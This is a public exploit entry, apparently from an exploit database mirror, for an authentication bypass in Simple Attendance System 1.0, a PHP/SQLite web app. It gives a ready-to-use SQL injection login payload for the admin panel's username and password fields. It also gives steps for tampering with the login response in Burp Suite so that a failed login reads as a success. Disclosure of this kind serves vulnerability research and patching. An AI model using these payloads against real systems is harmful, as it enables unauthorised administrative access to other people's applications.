769a5959a9
3 changes to exploits/shellcodes WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated) Simple Attendance System 1.0 - Authenticated bypass
33 lines
No EOL
1.1 KiB
Text
33 lines
No EOL
1.1 KiB
Text
# Exploit Title: Simple Attendance System 1.0 - Authenticated bypass
|
|
# Exploit Author: Abdullah Khawaja (hax.3xploit)
|
|
# Date: September 17, 2021
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip
|
|
# Tested on: Linux, windows
|
|
# Vendor: oretnom23
|
|
# Version: v1.0
|
|
|
|
# Exploit Description:
|
|
Simple Attendance System, is prone to multiple vulnerabilities.
|
|
Easy authentication bypass vulnerability on the application
|
|
allowing the attacker to login
|
|
|
|
|
|
----- PoC: Authentication Bypass -----
|
|
|
|
Administration Panel: http://localhost/attendance/login.php
|
|
|
|
Username: admin' or ''=' -- -+
|
|
Password: admin' or ''=' -- -+
|
|
|
|
|
|
----- PoC-2: Authentication Bypass -----
|
|
|
|
Steps:
|
|
1. Enter wrong crendentials http://localhost/attendance/login.php
|
|
2. Capture the request in burp and send it to repeater.
|
|
3. Forward the request.
|
|
4. In response tab, replace :
|
|
{"status":"failed","msg":"Invalid username or password."}
|
|
with
|
|
{"status":"success","msg":"Login successfully."} |